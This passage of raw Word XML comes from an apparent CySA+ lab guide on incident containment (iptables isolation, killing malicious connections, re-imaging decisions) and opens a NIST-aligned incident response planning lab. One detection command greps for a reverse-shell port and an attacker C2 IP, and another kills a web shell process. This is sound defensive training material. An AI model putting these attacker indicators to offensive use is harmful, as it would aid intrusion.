        </w:rPr>
        <w:t>The host is now reachable only from the SOC bastion on port 22 — every other connection (including the attacker's C2) is dead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Save the rules so isolation survives reboot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt install -y iptables-persistent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>netfilter-persistent save</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Without this, a reboot during eradication accidentally unisolates the host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Kill active malicious connections (eradication start)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Find the suspect process (Lab 5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ss -tunap | grep -E ':4444|185.220.101.45' 2&gt;/dev/null</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Then terminate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># pkill -KILL -f shell.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># kill -9 &lt;PID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Killing connections before isolation lets them re-establish; after isolation they cannot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Apply compensating controls (CySA+ "Compensating controls")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>While the team eradicates, mitigate continued risk on neighbouring systems:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Push an updated WAF rule blocking the IOCs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Push an updated EDR / Yara rule for the dropper hash (Lab 9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Add the IOCs to the threat-intel platform for everyone else.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Force a password reset for users that were logged into the box.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Disable the compromised account at the IdP (CySA+ "Identification and authentication failures" mitigation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Re-imaging vs cleanup decision</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Situation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Recommend</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kernel rootkit / MBR malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Re-image</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Unknown extent of compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Re-image</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Web shell, single file, known scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Clean + monitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin tier-0 system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Re-image, no exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Critical legacy system that can't be re-imaged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Compensating controls + segmentation (Lab 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Re-imaging is the only deterministic way to remove unknown unknowns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 9 — Verify isolation worked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># From the host (Killercoda terminal):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl --max-time 3 https://example.com || echo "blocked (expected)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ping -W2 -c1 1.1.1.1 || echo "blocked (expected)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Both should fail. SSH from the SOC bastion should still succeed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 10 — Document containment for the report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; /tmp/containment.md &lt;&lt;EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Containment record — Case 001</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Item | Value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Time isolated (UTC) | $(date -u +%FT%TZ) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Method | iptables default-DROP + SOC allowlist |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Allow-listed source | $SOC_IP:$SOC_PORTS |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Compensating controls | WAF block, EDR yara push, IdP account disable |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Re-image decision | Yes — root-level compromise |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Eradication owner | Platform team |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Recovery target | $(date -d '+24 hours' -u +%FT%TZ) |</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cat /tmp/containment.md</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Drop this straight into Lab 27's incident report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Isolate a host with default-DROP firewall while keeping a management channel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Distinguish containment, eradication, and recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Decide between cleanup and re-imaging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Apply compensating controls during the cleanup window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Both should fail. SSH from the SOC bastion should still succeed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 25 — Incident Response Playbook and Tabletop</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draft a NIST-aligned incident response plan, a one-page playbook, and run a 45-minute tabletop exercise against the scenario from Lab 20.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will draft a NIST-aligned incident response plan, a one-page playbook, and run a 45-minute tabletop exercise against the scenario from Lab 20. This maps to CySA+ 3.3 (Preparation — IR plan, Tools, Playbooks, Tabletop, Training, BC/DR; Post-incident — Forensic analysis, Root cause, Lessons learned).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Most of this lab is written/spoken work — no shell required.</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="2292046"/>
            <wp:docPr id="22" name="Picture 22"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_dc65adb904.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="2292046"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — The NIST 800-61 incident-response life cycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>┌──────────────┐    ┌────────────────┐    ┌─────────────────────┐    ┌────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>│ Preparation  │ -&gt; │ Detection &amp;    │ -&gt; │ Containment,        │ -&gt; │ Post-incident  │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>│              │    │ Analysis       │    │ Eradication,        │    │ Activity       │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>│              │    │                │    │ &amp; Recovery          │    │                │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>└──────────────┘    └────────────────┘    └─────────────────────┘    └────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ▲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xml:space="preserve">                                  Feedback (Lessons Learned)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CySA+ 3.3 is exactly this loop with two of its four phases broken out.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Author the high-level IR plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkdir -p /tmp/lab25 &amp;&amp; cd /tmp/lab25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
